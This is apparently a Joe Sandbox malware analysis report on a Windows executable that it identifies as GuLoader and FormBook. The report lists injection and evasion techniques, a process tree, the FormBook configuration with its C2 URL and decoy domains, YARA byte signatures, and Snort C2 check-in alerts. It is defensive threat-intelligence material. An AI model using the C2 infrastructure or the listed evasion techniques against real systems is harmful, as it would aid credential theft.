Edit tour

Windows Analysis Report
SC.028UCCP.exe

Overview

General Information

Sample Name:	SC.028UCCP.exe
Analysis ID:	830301
MD5:	3f8f4a7f43b5627ed45128bb99f0b471
SHA1:	1c1931fe8db9b5df89d39e3121fa72c2a355ded1
SHA256:	0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect Any.run

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

SC.028UCCP.exe (PID: 6716 cmdline: C:\Users\user\Desktop\SC.028UCCP.exe MD5: 3F8F4A7F43B5627ED45128BB99F0B471)

SC.028UCCP.exe (PID: 2704 cmdline: C:\Users\user\Desktop\SC.028UCCP.exe MD5: 3F8F4A7F43B5627ED45128BB99F0B471)

explorer.exe (PID: 4768 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

mstsc.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: B038F39C887BE2A810E20B08613F3B84)

cmd.exe (PID: 2296 cmdline: /c del "C:\Users\user\Desktop\SC.028UCCP.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eliteequinewellness.com/ms12/"], "decoy": ["familywealthsociety.com", "hypnotherapywashington.com", "top-promotion.net", "tovber.xyz", "guiadestudio.com", "alibabas.international", "campsitecredits.com", "18370327105.com", "yvhome.net", "triknblog.net", "limpiezasturisticas.com", "khaivisuals.com", "amyjohnsonrealtor.com", "websponsorzone.net", "cobblestonemineralslp.com", "women-clothing-64680.com", "houtme.com", "404shadydale.com", "laposadaapts.com", "paparazirestaurant.co.uk", "helios.moe", "kx2662.com", "expatsturkiye.com", "levelhsealth.com", "eeccu.info", "princestrustawards.co.uk", "lingdangcj.com", "goverifyvin.com", "innovapay.africa", "dvxlbw.top", "g20.xn--fiq228c5hs", "fdbezd.top", "findcar.uk", "lordsbury.co.uk", "brainmovementinternational.com", "slysz.com", "thinkdev.africa", "garageautosaintthomas.com", "bhspharmas.com", "likemommy.online", "hospitalityhsia.com", "friendsofquarepianos.co.uk", "chejukongjian.com", "drugtestingservices.co.uk", "abimpianti.ch", "lasvegasestimates.com", "expertprestartupbootcamp.co.uk", "centersuico.com", "consolewars.net", "cafemarita.site", "findyellowfreightjobs.com", "economjchq.space", "everwoodpreserving.net", "lists-cellphones.life", "buckleyassociates.co.uk", "littel-italy.com", "hangrytots.com", "ss777.net", "arborfinancialgroup.info", "hookspatqp.space", "finesttravels.africa", "fullhousemarketer.com", "conscienciaretroprogresiva.com", "arialttnr.com"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2969977740.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2936860727.0000000002C10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000007.00000002.7461101436.000000000AD28000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xb92:$a2: pass 0xb98:$a3: email 0xb9f:$a4: login 0xba6:$a5: signin 0xbb7:$a6: persistent 0xd8a:$r1: C:\Users\user\AppData\Roaming\563BT2R6\563log.ini
00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2936860727.000000000411D000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: SC.028UCCP.exe PID: 2704	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x388844:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 188.114.97.3

Timestamp:	192.168.11.20188.114.97.349822802031449 03/20/23-09:10:34.025355
SID:	2031449
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 142.250.186.51

Timestamp:	192.168.11.20142.250.186.5149827802031412 03/20/23-09:11:35.414280
SID:	2031412
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 104.21.39.114

Timestamp:	192.168.11.20104.21.39.11449842802031449 03/20/23-09:15:00.044344
SID:	2031449
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.185.159.144

Timestamp:	192.168.11.20198.185.159.14449830802031412 03/20/23-09:12:15.932254
SID:	2031412
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 13.248.157.32

Timestamp:	192.168.11.2013.248.157.3249840802031449 03/20/23-09:14:39.545243
SID:	2031449
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 165.160.15.20

Timestamp:	192.168.11.20165.160.15.2049835802031449 03/20/23-09:13:17.988587
SID:	2031449
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.185.159.144

Timestamp:	192.168.11.20198.185.159.14449830802031453 03/20/23-09:12:15.932254
SID:	2031453
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 81.17.29.147

Timestamp:	192.168.11.2081.17.29.14749823802031412 03/20/23-09:10:54.265433
SID:	2031412
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 198.185.159.144

Timestamp:	192.168.11.20198.185.159.14449830802031449 03/20/23-09:12:15.932254
SID:	2031449
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 169.60.232.139

Timestamp:	192.168.11.20169.60.232.13949844802031449 03/20/23-09:15:33.016841
SID:	2031449
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 142.250.186.51

Timestamp:	192.168.11.20142.250.186.5149827802031453 03/20/23-09:11:35.414280
SID:	2031453
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 81.17.29.147

Timestamp:	192.168.11.2081.17.29.14749823802031453 03/20/23-09:10:54.265433
SID:	2031453
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 165.160.15.20

Timestamp:	192.168.11.20165.160.15.2049835802031412 03/20/23-09:13:17.988587
SID:	2031412
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 104.21.39.114

Timestamp:	192.168.11.20104.21.39.11449842802031453 03/20/23-09:15:00.044344
SID:	2031453
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 142.250.186.51

Timestamp:	192.168.11.20142.250.186.5149827802031449 03/20/23-09:11:35.414280
SID:	2031449
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 104.21.39.114

Timestamp:	192.168.11.20104.21.39.11449842802031412 03/20/23-09:15:00.044344
SID:	2031412
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 165.160.15.20

Timestamp:	192.168.11.20165.160.15.2049835802031453 03/20/23-09:13:17.988587
SID:	2031453
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic .bin download from Dotted Quad - Source IP: 192.168.11.20 - Destination IP: 195.133.40.46

Timestamp:	192.168.11.20195.133.40.4649810802018752 03/20/23-09:09:13.434535
SID:	2018752
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 188.114.97.3

Timestamp:	192.168.11.20188.114.97.349822802031412 03/20/23-09:10:34.025355
SID:	2031412
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 13.248.157.32

Timestamp:	192.168.11.2013.248.157.3249840802031453 03/20/23-09:14:39.545243
SID:	2031453
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 188.114.97.3

Timestamp:	192.168.11.20188.114.97.349822802031453 03/20/23-09:10:34.025355
SID:	2031453
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 13.248.157.32

Timestamp:	192.168.11.2013.248.157.3249840802031412 03/20/23-09:14:39.545243
SID:	2031412
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 169.60.232.139

Timestamp:	192.168.11.20169.60.232.13949844802031453 03/20/23-09:15:33.016841
SID:	2031453
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 169.60.232.139

Timestamp:	192.168.11.20169.60.232.13949844802031412 03/20/23-09:15:33.016841
SID:	2031412
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 81.17.29.147

Timestamp:	192.168.11.2081.17.29.14749823802031449 03/20/23-09:10:54.265433
SID:	2031449
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SC.028UCCP.exe	Virustotal: Detection: 50%			Perma Link
Source: SC.028UCCP.exe	ReversingLabs: Detection: 33%

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: 8.2.mstsc.exe.50cf840.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.mstsc.exe.2f43518.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.explorer.exe.13c7f840.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.eliteequinewellness.com/ms12/"], "decoy": ["familywealthsociety.com", "hypnotherapywashington.com", "top-promotion.net", "tovber.xyz", "guiadestudio.com", "alibabas.international", "campsitecredits.com", "18370327105.com", "yvhome.net", "triknblog.net", "limpiezasturisticas.com", "khaivisuals.com", "amyjohnsonrealtor.com", "websponsorzone.net", "cobblestonemineralslp.com", "women-clothing-64680.com", "houtme.com", "404shadydale.com", "laposadaapts.com", "paparazirestaurant.co.uk", "helios.moe", "kx2662.com", "expatsturkiye.com", "levelhsealth.com", "eeccu.info", "princestrustawards.co.uk", "lingdangcj.com", "goverifyvin.com", "innovapay.africa", "dvxlbw.top", "g20.xn--fiq228c5hs", "fdbezd.top", "findcar.uk", "lordsbury.co.uk", "brainmovementinternational.com", "slysz.com", "thinkdev.africa", "garageautosaintthomas.com", "bhspharmas.com", "likemommy.online", "hospitalityhsia.com", "friendsofquarepianos.co.uk", "chejukongjian.com", "drugtestingservices.co.uk", "abimpianti.ch", "lasvegasestimates.com", "expertprestartupbootcamp.co.uk", "centersuico.com", "consolewars.net", "cafemarita.site", "findyellowfreightjobs.com", "economjchq.space", "everwoodpreserving.net", "lists-cellphones.life", "buckleyassociates.co.uk", "littel-italy.com", "hangrytots.com", "ss777.net", "arborfinancialgroup.info", "hookspatqp.space", "finesttravels.africa", "fullhousemarketer.com", "conscienciaretroprogresiva.com", "arialttnr.com"]}

Source: SC.028UCCP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: mshtml.pdb source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
